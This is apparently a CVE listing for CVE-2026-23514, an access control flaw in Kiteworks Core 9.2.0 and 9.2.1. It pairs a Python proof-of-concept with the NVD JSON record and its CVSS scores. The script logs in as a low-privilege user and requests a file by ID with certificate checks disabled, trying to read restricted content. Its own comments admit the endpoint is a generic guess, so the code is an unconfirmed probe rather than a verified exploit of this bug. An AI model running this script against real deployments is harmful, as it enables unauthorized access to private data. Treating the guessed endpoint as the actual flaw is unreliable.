CVE-2026-23514

#!/usr/bin/env python3 import requests def verify_vulnerability(target_url, username, password): """ PoC for CVE-2026-23514: Access Control Vulnerability in Kiteworks Core. This script attempts to access unauthorized content using a low-privilege user. """ session = requests.Session() # Step 1: Authenticate as a low-privilege user login_payload = { "username": username, "password": password } login_resp = session.post(f"{target_url}/login", data=login_payload) if login_resp.status_code != 200: print("[!] Login failed.") return print("[+] Login successful.") # Step 2: Attempt to access a specific resource ID that should be restricted # Example: Accessing file ID 1 or admin configuration endpoint # The specific endpoint depends on the application logic, here is a generic example. target_resource_id = "1" attack_url = f"{target_url}/api/v1/files/{target_resource_id}" headers = { "User-Agent": "Mozilla/5.0 (PoC Scanner)", "Accept": "application/json" } response = session.get(attack_url, headers=headers, verify=False) if response.status_code == 200: print(f"[+] Vulnerability confirmed! Successfully accessed restricted resource: {attack_url}") print(f"[+] Response data: {response.text[:100]}") else: print(f"[-] Access denied or resource not found. Status: {response.status_code}") if __name__ == "__main__": # Replace with actual target details target = "https://kiteworks-example.com" user = "low_priv_user" pwd = "password123" verify_vulnerability(target, user, pwd)

{"cve": {"id": "CVE-2026-23514", "sourceIdentifier": "[email protected]", "published": "2026-03-25T15:16:37.967", "lastModified": "2026-03-27T18:52:37.110", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kiteworks is a private data network (PDN). Versions 9.2.0 and 9.2.1 of Kiteworks Core have an access control vulnerability that allows authenticated users to access unauthorized content. Upgrade Kiteworks Core to version 9.2.2 or later to receive a patch."}, {"lang": "es", "value": "Kiteworks es una red de datos privada (PDN). Las versiones 9.2.0 y 9.2.1 de Kiteworks Core tienen una vulnerabilidad de control de acceso que permite a los usuarios autenticados acceder a contenido no autorizado. Actualice Kiteworks Core a la versión 9.2.2 o posterior para recibir un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-282"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:accellion:kiteworks:9.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E39C1D0F-1FB2-424A-9EE4-5B653A1AC66E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:accellion:kiteworks:9.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "A06208F4-EF54-43E5-84D8-144173AA604A"}]}]}], "references": [{"url": "https://github.com/kiteworks/security-advisories/security/advisories/GHSA-5gqr-cpr6-wvm5", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}